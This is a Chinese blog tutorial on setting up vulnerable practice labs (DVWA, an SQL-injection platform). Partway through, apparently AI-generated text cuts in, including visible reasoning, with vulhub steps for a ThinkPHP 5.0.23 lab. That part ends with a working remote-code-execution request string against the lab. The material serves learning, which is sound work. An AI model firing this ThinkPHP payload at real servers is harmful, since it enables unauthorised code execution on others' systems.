漏洞环境搭建

本文介绍了如何在Linux和Windows系统上搭建LANMP/WAMP环境,并详细讲述了搭建DVWA、SQL注入平台和XSS测试平台的步骤,包括配置、源码部署、数据库设置和权限修改等关键操作。

$ 漏洞环境搭建

配合徐焱《Web安全攻防:渗透测试实战指南》第二章

一、在linux系统中安装LANMP
二、在Windows系统中安装WAMP

​ 安装时缺少MSVCP110.dll和MSVCR110.dll,32位系统放在C:\Windows\SystemWOW64中,64位系统放在C:\Windows\System32中

三、搭建DVWA漏洞环境
  1. 保存并复制所有源码,粘贴在网站的根目录中

​ 将dvwa-master文件夹重命名为dvwa,复制到WAMP路径下,config文件夹下的config.inc.php.dist重命名为config.inc.php
2. reCAPTCHAP key: Missing

​ 编辑dvwa\config\config.inc.php

$_DVWA[ 'recaptcha_public_key' ] = ''
$_DVWA[ 'recaptcha_private_key' ] = ''

改为

$_DVWA[ 'recaptcha_public_key' ] = '6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb'; 
$_DVWA[ 'recaptcha_private_key' ] = '6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K';

参考文档:https://blog.youkuaiyun.com/RBPicsdn/article/details/80059132
3.

Could not connect to the MySQL service. Please check the config file.
Your database user is root, if you are using MariaDB, this will not work, please read the README.md file.

​ 在dvwa\config中config.inc.php,将$_DVWA[ 'db_password' ]改为“root”或为空
4. DVWA登录

​ 默认用户名/口令:admin/password

四、搭建SQL注入平台
  1. 打开浏览器访问127.0.0.1/sql1/

<think>好的,我需要帮助用户搭建ThinkPHP漏洞环境进行安全测试或学习。首先,我应该回顾用户提供的引用内容,看看有哪些可用的信息。 根据引用[2],用户提到了在vulhub下搭建ThinkPHP漏洞环境的步骤,包括访问漏洞环境和推荐另一篇安装教程。引用[3]详细说明了漏洞原理,给出了环境搭建的具体命令,比如进入vulhub-master/thinkphp/5.0.23-rce目录,使用docker-compose up -d启动环境,然后用docker ps检查状态。这说明vulhub项目已经提供了现成的漏洞环境配置,用户只需要按照步骤操作即可。 接下来,我需要将这些信息整理成一个清晰的步骤指南。首先,确保用户已经安装了Docker和Docker Compose,因为vulhub依赖这些工具。然后,指导用户下载vulhub源码,进入对应的漏洞目录,启动容器,最后验证环境是否成功运行。 可能还需要提醒用户注意安全,确保在隔离的环境中测试,避免对真实系统造成影响。此外,引用[3]提到的漏洞版本是5.0.0到5.0.23,用户需要确认自己下载的是正确的版本,比如5.0.23-rce目录下的配置。 用户可能遇到的问题包括Docker安装失败、目录路径错误或端口冲突等,应该提前预见到这些问题给出解决建议。例如,检查Docker服务是否运行,确认目录是否正确,以及如何关闭占用端口的进程。 最后,生成相关问题,帮助用户进一步学习,比如如何分析漏洞原理、如何修复这类漏洞,或者ThinkPHP的其他安全措施。需要确保问题与主题相关,引导用户深入探索。</think>### ThinkPHP漏洞环境搭建教程 #### 步骤1:环境准备 1. 安装Docker和Docker Compose - Linux系统: ```bash curl -fsSL https://get.docker.com | bash -s docker sudo systemctl start docker && sudo systemctl enable docker sudo curl -L "https://github.com/docker/compose/releases/latest/download/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose sudo chmod +x /usr/local/bin/docker-compose ``` - Windows/macOS: 下载[Docker Desktop](https://www.docker.com/products/docker-desktop/) 2. 下载漏洞环境源码 ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub ``` #### 步骤2:部署ThinkPHP漏洞环境 1. 进入目标漏洞目录(以5.0.23版本为例) ```bash cd thinkphp/5.0.23-rce ``` 2. 启动容器 ```bash docker-compose up -d ``` 此命令会自动构建启动包含漏洞的ThinkPHP环境[^3]。 3. 验证容器状态 ```bash docker ps ``` 输出应包含类似`thinkphp_5.0.23-rce`的容器信息。 #### 步骤3:访问漏洞环境 1. 通过浏览器或工具访问 - 浏览器访问:`http://localhost:8080` - 若端口冲突,可修改`docker-compose.yml`中的端口映射(如`8080:80`改为`8081:80`) #### 步骤4:漏洞验证(示例) 尝试触发远程代码执行漏洞(仅供学习): ```bash curl "http://localhost:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1" ``` 若返回PHP配置信息,则环境搭建成功。 --- ### 注意事项 1. **安全隔离**:建议在虚拟机或独立网络中操作,避免影响真实系统 2. **环境清理** ```bash docker-compose down ``` 3. **合法授权**:仅用于授权测试或学习研究 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值